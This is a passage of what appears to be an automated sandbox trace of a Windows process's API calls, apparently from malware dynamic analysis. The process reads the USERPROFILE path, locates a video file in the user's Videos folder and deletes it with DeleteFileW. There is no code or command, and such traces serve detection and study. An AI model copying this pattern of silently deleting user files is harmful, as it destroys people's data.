lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0259.105] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.105] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.105] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.105] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.105] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.105] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.105] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.105] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.105] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.106] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.106] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.106] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.106] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0259.106] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.106] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.106] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.106] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.107] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.107] FreeLibrary (hLibModule=0x74d40000) returned 1 [0259.107] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.107] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.107] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.107] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.107] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.107] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.107] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.108] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0259.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0259.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0259.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0259.109] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/S8aFA8f.mkv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S8aFA8f.mkv", lpFilePart=0x8bedfc*="S8aFA8f.mkv") returned 0x30 [0259.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0259.109] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S8aFA8f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s8afa8f.mkv")) returned 0x20 [0259.110] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S8aFA8f.mkv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eaa2d20, ftCreationTime.dwHighDateTime=0x1d4cc59, ftLastAccessTime.dwLowDateTime=0x9d351340, ftLastAccessTime.dwHighDateTime=0x1d4cd86, ftLastWriteTime.dwLowDateTime=0x9d351340, ftLastWriteTime.dwHighDateTime=0x1d4cd86, nFileSizeHigh=0x0, nFileSizeLow=0x173f7, dwReserved0=0x1948, dwReserved1=0x4, cFileName="S8aFA8f.mkv", cAlternateFileName="")) returned 0xaa57a0 [0259.110] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S8aFA8f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s8afa8f.mkv")) returned 1 [0259.112] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eaa2d20, ftCreationTime.dwHighDateTime=0x1d4cc59, ftLastAccessTime.dwLowDateTime=0x9d351340, ftLastAccessTime.dwHighDateTime=0x1d4cd86, ftLastWriteTime.dwLowDateTime=0x9d351340, ftLastWriteTime.dwHighDateTime=0x1d4cd86, nFileSizeHigh=0x0, nFileSizeLow=0x173f7, dwReserved0=0x1948, dwReserved1=0x4, cFileName="S8aFA8f.mkv", cAlternateFileName="")) returned 0 [0259.112] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0259.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0259.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0259.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0259.112] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0259.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0259.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0259.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0259.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0259.113] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0259.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.113] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0259.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0259.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0259.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0259.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0259.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0259.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0259.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0259.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0259.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0259.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0259.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0259.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0259.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0259.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/S8aFA8f.mkv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S8aFA8f.mkv", lpFilePart=0x8bf658*="S8aFA8f.mkv") returned 0x30 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0259.115] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S8aFA8f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s8afa8f.mkv")) returned 0xffffffff [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0259.116] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0259.116] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0259.116] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0259.116] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0259.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0259.116] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0259.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0259.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0259.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0259.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0259.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0259.117] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0259.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0259.117] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf2c0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0259.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0259.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0259.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 